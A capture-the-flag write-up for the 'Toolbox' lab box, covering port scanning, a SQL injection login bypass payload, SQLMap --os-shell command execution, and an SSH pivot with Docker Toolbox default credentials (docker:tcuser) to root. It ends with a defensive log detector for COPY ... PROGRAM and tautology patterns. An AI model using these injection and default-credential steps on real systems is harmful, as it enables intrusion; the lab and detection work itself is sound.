Myles Nieman

Toolbox

Overview

Toolbox is an easy Windows box with a layered environment: a Windows host runs Docker Toolbox, which spins up a Linux VM containing a PostgreSQL-backed web application. A virtual-host discovery trick surfaces an admin login at admin.megalogistic.com that is vulnerable to SQL injection. SQLMap’s --os-shell mode executes commands as the postgres user inside the container. From there, the Docker Toolbox VM’s SSH service on the internal 172.17.0.1 gateway accepts the documented default credentials (docker:tcuser), and the docker user has passwordless sudo — meaning the Windows host’s C:\ drive, mounted at /c, is browsable as root.

Path: SQLi on admin portal → os-shell as postgres in container → SSH to Docker Toolbox VM (docker:tcuser) → sudo → /c/Users/Administrator/Desktop/root.txt.

Enumeration

A full port scan reveals a Windows host with an FTP server (anonymous access), SSH, SMB, WinRM, and an HTTPS web application:

$ nmap -p- -A 10.129.96.171
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
22/tcp    open  ssh           OpenSSH for_Windows_7.7
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.38 ((Debian))
| ssl-cert: Subject: commonName=admin.megalogistic.com
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0

Nmap full scan output for Toolbox

Two things jump out immediately: anonymous FTP exposes docker-toolbox.exe — the legacy Docker-on-Windows solution — and the TLS certificate’s common name is admin.megalogistic.com, a virtual host not in DNS. I added both megalogistic.com and admin.megalogistic.com to /etc/hosts.

Foothold — SQL Injection on the Admin Portal

Browsing to https://admin.megalogistic.com shows a login form.

admin.megalogistic.com login page

Common default credential pairs (admin:admin, admin:password) fail. Entering a single quote in the username field returns a database error:

Single-quote in the username triggers a visible SQL error

The error confirms PostgreSQL and an injectable parameter. A classic 'OR'1'='1 auth-bypass payload grants access to the admin dashboard:

Auth bypass payload logs in to the admin dashboard

Admin dashboard after login — includes a todo: “Send creds to tony”

The dashboard has limited functionality, so I moved straight to getting command execution. I saved the login POST request from Burp and fed it to SQLMap with --os-shell:

$ sqlmap -r req --os-shell

SQLMap os-shell drops an interactive prompt as postgres

The shell runs as the postgres database user. A quick look around confirms we’re inside a Docker container:

os-shell> whoami
postgres

os-shell> ls /home
tony

os-shell> ls /var/lib/postgresql
11
user.txt

The user flag is at /var/lib/postgresql/user.txt.

Lateral Movement — Escaping the Container

The FTP docker-toolbox.exe was a hint: Docker Toolbox runs a lightweight Linux VM (boot2docker) to host containers on Windows, accessible over SSH. The VM uses a well-known default credential pair: docker:tcuser.

docker-toolbox.exe retrieved from anonymous FTP

Checking /etc/hosts inside the container reveals the gateway:

postgres@bc56e3cc55e9:~$ cat /etc/hosts
127.0.0.1   localhost
172.17.0.2  bc56e3cc55e9

So 172.17.0.1 is the Docker bridge gateway — the Toolbox VM itself. I upgraded to a proper TTY and pivoted internally:

postgres@bc56e3cc55e9:~$ python3 -c 'import pty;pty.spawn("bash")'
postgres@bc56e3cc55e9:~$ ssh docker@172.17.0.1

SSH to 172.17.0.1 with docker:tcuser succeeds

Running linpeas from the container first revealed that nsenter could potentially be used for a Docker escape, but the container lacked sudo. The SSH path to the Toolbox VM was cleaner.

linpeas output inside the container, highlighting nsenter

$ ssh docker@172.17.0.1
docker@172.17.0.1's password: tcuser

docker@box:~$ sudo su
root@box:/home/docker#

sudo su as docker gives a root shell on the Toolbox VM

The docker user has passwordless sudo on the Toolbox VM.

Root

The Toolbox VM’s /c directory is the Windows host’s C:\ drive:

root@box:/home/docker# ls /c
Users
root@box:/home/docker# ls /c/Users
Administrator  Default  Public  Tony
root@box:/c/Users/Administrator/Desktop# ls
desktop.ini  root.txt

The Windows Administrator desktop is directly readable, and the root flag is there.

Takeaways

  • SQLMap --os-shell against a PostgreSQL backend is a straightforward path to command execution — the COPY TO/FROM PROGRAM technique runs system commands as the database service user.
  • Docker Toolbox’s default SSH credentials (docker:tcuser) are documented but often overlooked; combined with passwordless sudo on the VM and the Windows drive mounted at /c, this collapses a container escape into trivial host access.
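On the defensive side, both stages of this chain leave a visible trace in PostgreSQL statement logging (log_statement = 'all'): the tautology in the login query and the COPY ... FROM/TO PROGRAM statements SQLMap's os-shell issues. The following detector, added here as an example and not part of the original writeup, scans constructed log lines for those two patterns.

```python
import re

# Constructed sample of PostgreSQL log lines (default '%m [%p] ' prefix,
# log_statement = 'all'); not captured from the box.
SAMPLE_LOG = """\
2020-02-18 10:00:01.101 UTC [412] LOG:  statement: SELECT * FROM users WHERE username = 'admin' AND password = 'admin'
2020-02-18 10:00:02.207 UTC [412] LOG:  statement: SELECT * FROM users WHERE username = '' OR '1'='1' AND password = 'x'
2020-02-18 10:00:03.310 UTC [413] LOG:  statement: CREATE TABLE pg_temp.cmd_exec(cmd_output text)
2020-02-18 10:00:03.412 UTC [413] LOG:  statement: COPY pg_temp.cmd_exec FROM PROGRAM 'whoami'
2020-02-18 10:00:03.515 UTC [413] LOG:  statement: SELECT * FROM pg_temp.cmd_exec
2020-02-18 10:00:04.620 UTC [413] LOG:  statement: COPY (SELECT 1) TO PROGRAM 'id'
2020-02-18 10:00:05.725 UTC [414] LOG:  statement: SELECT * FROM orders WHERE id = 42
"""

RULES = [
    # COPY to/from a program is OS command execution as the postgres OS user
    ("copy_program", re.compile(r"\bCOPY\b.*\b(FROM|TO)\s+PROGRAM\b", re.I)),
    # OR 'x'='x' style tautology used for authentication bypass
    ("tautology_or", re.compile(r"\bOR\s*'([^']*)'\s*=\s*'\1'", re.I)),
]


def scan_postgres_log(text):
    """Return (line_no, rule_name, statement) for every logged statement that matches a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = re.search(r"statement:\s*(.*)$", line)
        if not m:
            continue  # not a statement line (e.g. connection messages)
        stmt = m.group(1)
        for name, rx in RULES:
            if rx.search(stmt):
                hits.append((n, name, stmt))
    return hits


if __name__ == "__main__":
    for line_no, rule, stmt in scan_postgres_log(SAMPLE_LOG):
        print(f"line {line_no}: {rule}: {stmt}")
```

Alerting on COPY ... PROGRAM is only a backstop; the durable fix is that the web application's database role is not a superuser and is not a member of pg_execute_server_program, so the statement fails regardless of the injection.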